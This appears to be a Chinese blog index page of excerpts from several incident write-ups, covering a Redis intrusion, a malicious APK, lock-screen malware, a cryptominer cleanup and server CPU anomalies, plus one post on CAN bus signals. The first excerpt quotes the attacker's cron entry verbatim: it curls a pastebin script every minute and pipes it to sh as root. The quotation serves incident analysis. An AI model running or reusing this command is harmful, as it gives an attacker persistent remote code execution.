起因 偶然间发现redis里有一个陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的，再看value我警觉了，这是要定时执行脚本啊。 分析 ...

写个笔记记录一下，起因是朋友在QQ上发了个连接叫我看看 安不安全，叫我帮他看看，反正在店里待着也没生意，那就顺便看看咯。 打开这个网址 会自动弹出下载一个名为OOXX的APK安装包。 ...

有一天，在机缘巧合之下我获得了一个锁机软件（是多巧合阿喂！），然后兴高采烈的把它拖入了虚拟机里蹂躏（>_<!）。 很巧，软件有虚拟机检测。。。 Emmmm好吧，随便 ...

Prepare CAN通信协议使用了有一段时间了，但都是基于软件层面的使用，对于其波形不是很了解，正好这段时间比较闲，是时候补补硬知识。 开始之前，先介绍一下设备： 咸鱼淘来的古董级别示波 ...

XX公司网络卡断问题 1. 问题现象 2017年XX公司机关网络出现几次异常情况，并寻求内外部专家对异常情况进行诊断分析，均未找到原因，具体情况如下： 1.XX分公司机关网络IP地址为10.0.0.1-10.0.0.254，上半年约有15台电 ...

概述： 9.4号临时接到通知让一个人去应急，第一次应急，比较虚，到客户那里了解了一下情况。主要现象是流量异常，CPU占用过高。 发现连接数超多-17779，然后在试图连接其他主机的22端口 发现异常进程，当初进行杀死之后，从九点到晚上十点cpu都是正常的，然后上午通过查看日志last ...

背景 新接手了个环境，同事交接时说这些机器中过挖矿病毒还没重装，我TM。。。 线上环境不好动，只能手动查杀了。 操作系统如下： 过程 ssh上去，ps -ef看到如下： 手动kill掉进程，很快会生成新的，猜测有守护进程。用STOP信号让它停止。 查看定时任务清理 ...

首先贴上情况 一个redis 程序占用cpu 46%,虽然redis-server 有定时清理过期的键,但也不会占用这么高的CPU吧,一般都是0.3% 看看这个进程什么鬼 ...